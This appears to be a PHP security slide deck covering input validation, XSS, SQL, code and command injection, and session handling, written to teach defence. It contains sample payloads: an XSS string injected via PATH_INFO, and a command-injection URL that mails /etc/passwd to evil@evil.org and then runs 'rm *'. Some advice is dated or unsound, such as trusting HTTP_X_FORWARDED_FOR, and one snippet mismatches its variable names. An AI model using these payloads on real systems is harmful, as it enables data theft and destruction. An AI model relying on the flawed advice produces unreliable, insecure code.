PHP Security

by

Uttam KumarEmail:- trickyuk001@gmail.com

Mobile:- 8149253187

What is Security?

measurement…

safety…

protection…

Secure Web Applications

web security issues have to do with:– hacker attacks

• denial of service

• server hijacking

– common threats– compromise of data

PHP & Security

a growing language…

a major concern…

Never trust the web…

Input data validation– register_globals = OFF– $_REQUEST[] big NO NO …– type casting input data

• No isNumeric() if data is numeric [locale problem]• regularExp if data is string

– Path validation• Always use basename()

Never trust the web…

• Content size validation– use server side max length validation

– File Upload• Check destination file size with $_FILES[‘name’][‘size’]• I think Browser MIME header is reliable right ?

– Use getImageSize() in case of image

• External source upload like Avtar– Make a local copy if path/of/file submitted from a URL.

XSS attack

– Can lead to embarrassment.– Session take-over.– Password theft.– User tracking by 3rd parties

XSS attack

Prevention is better than cure– Use striptags()

• No tag allowance please

– Use htmlentities()– Is $_SERVER safe ?

• Can be set…• Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo• $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;• $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo

– IP based info• Use HTTP_X_FORWARDED_FOR• Use long2ip()

– $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);– $sValidIp = long2ip(ip2long(array_pop($ipss)));

SQL Injection

WWW

– Arbitrary query execution– Removal of data.– Modification of existing values.– Denial of service.– Arbitrary data injection.

Preventing SQL injection

• Are magic quotes enough?– use mysql_real_escape_string()– use prepared statements– avoid omitting single quotes– LIKE quandary need addslashes()– avoid printing query– Authentication data storage

• Encrypt sensitive data to access database• Make sure it’s only loaded for certain VirtualHost

Authentication Data Storage

SetEnv DB_LOGIN “login”SetEnv DB_PASSWD “password”Set Env DB_HOST “127.0.0.7”

<virtualHost iila.ws> include /home/illa/sql.conf</virtualHost>

$_SERVER[‘DB_LOGIN’]$_SERVER[‘DB_PASSWD’]

/home/illa/sql.conf Apache server configuration

PHP file

Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”

Preventing code injection

– Path validation– Validate fileName

$sFile = “D\’sozaRes.doc’;

basename($sFile); //will return D\’sozaRes.doc on *nix systembasename($sFile); //will return ’sozaRes.doc on win32

• Remove slashes• Keep white list of file name• Use full path

– Avoid variables in eval()– Avoid using variable passed by users for regEx.

Command injection

– Use escapeshellcmd () and escapeshellarg()

– Use full path for command– Set prority and memory limit for command

• shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);

Calling External Programs

<?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?>

The user could control $to to yield:

http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A

which would result in running the command:

/usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm *

a solution would be:

$fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);

Securing sessions

• Weakness of session– Server side weakness…

• ls –l /tmp/sess_* //can reveal session info

– URL session exploitation

• Solution– Native protection.– Mixing security and convenience. – Securing session storage path– Check browser signature– Referrer validation

Questions…????

Thank You !!